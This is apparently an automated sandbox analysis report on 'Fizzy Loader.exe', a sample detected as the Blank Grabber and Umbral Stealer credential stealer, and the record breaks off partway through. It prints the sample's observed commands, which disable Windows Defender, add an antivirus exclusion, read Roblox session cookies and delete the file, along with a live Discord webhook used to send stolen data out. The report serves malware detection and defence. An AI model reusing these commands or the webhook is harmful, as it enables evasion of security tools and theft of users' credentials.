Windows Analysis Report
Fizzy Loader.exe

Overview

General Information

Sample name: Fizzy Loader.exe
Analysis ID: 1582592
MD5: b56af795f8b7edc6f35a9e905921ed0e
SHA1: c82cb0088bc9c93fd9a491ad278f410d44265a4d
SHA256: 46a67cdc899f61ccb6324d187d56b389f720d72beb02594fd60fdc4a8ca62ab4
Tags: exe, UmbralStealer, user-aachum

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Fizzy Loader.exe (PID: 1708 cmdline: "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: B56AF795F8B7EDC6F35A9E905921ED0E)
    • WMIC.exe (PID: 1996 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5080 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5688 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4568 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6156 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1892 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 428 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6552 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 4308 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7156 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1308 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 432 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3560 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5656 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx", "Version": "v1.3"}
Source | Rule | Description | Author | Strings
Fizzy Loader.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | (none)
Fizzy Loader.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security | (none)
Fizzy Loader.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | (none)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security | (none)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | (none)
00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security | (none)
00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | (none)
00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | (none)
00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | (none)

Source | Rule | Description | Author | Strings
0.0.Fizzy Loader.exe.172aed80000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | (none)
0.0.Fizzy Loader.exe.172aed80000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security | (none)
0.0.Fizzy Loader.exe.172aed80000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "powershell.exe